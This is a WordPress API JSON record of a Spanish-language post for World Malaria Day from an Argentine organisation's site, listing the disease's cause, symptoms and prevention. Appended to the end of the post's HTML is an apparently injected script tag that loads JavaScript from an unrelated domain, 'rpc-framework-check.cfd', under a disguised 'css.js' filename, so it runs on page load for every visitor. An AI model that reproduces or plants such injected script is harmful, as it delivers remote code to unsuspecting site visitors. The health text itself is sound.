{"id":18398,"date":"2025-04-25T09:56:16","date_gmt":"2025-04-25T12:56:16","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18398"},"modified":"2026-02-02T17:13:22","modified_gmt":"2026-02-02T20:13:22","slug":"dia-mundial-del-paludismo","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/04\/dia-mundial-del-paludismo\/","title":{"rendered":"D\u00eda mundial del Paludismo"},"content":{"rendered":"\n<p>La fecha fue instaurada por los Estados Miembros de la OMS en la Asamblea Mundial de la Salud de 2007.<\/p>\n\n\n\n<p>El objetivo de la jornada es subrayar la necesidad de invertir permanentemente y mantener los compromisos para prevenir y controlar esta enfermedad que afecta a millones&nbsp; de personas en todo el \ud83c\udf0d y principalmente en regiones tropicales.&nbsp;<\/p>\n\n\n\n<p>&nbsp;Es causada por par\u00e1sitos transmitidos por la picadura del mosquito Anopheles.<\/p>\n\n\n\n<p>\ud83d\udd0e S\u00edntomas principales:<\/p>\n\n\n\n<p>* Fiebre<\/p>\n\n\n\n<p>* Escalofr\u00edos<\/p>\n\n\n\n<p>* Dolor muscular y de cabeza<\/p>\n\n\n\n<p>* N\u00e1useas o v\u00f3mitos<\/p>\n\n\n\n<p>\u26a0\ufe0f Es prevenible y tratable, pero sigue siendo una amenaza para muchas comunidades.<\/p>\n\n\n\n<p>\ud83d\udd2c La clave est\u00e1 en la prevenci\u00f3n, el diagn\u00f3stico temprano y el acceso a tratamientos eficaces.<\/p>\n\n\n\n<p>\ud83d\udca1 \u00bfSab\u00edas que usar mosquiteros, repelente y eliminar criaderos de mosquitos puede salvar vidas?<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>La fecha fue instaurada por los Estados Miembros de la OMS en la Asamblea Mundial&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18399,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[146,98,147,97,85,148],"tags":[],"class_list":["post-18398","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18398"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18398\/revisions"}],"predecessor-version":[{"id":20830,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18398\/revisions\/20830"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18399"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18398"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}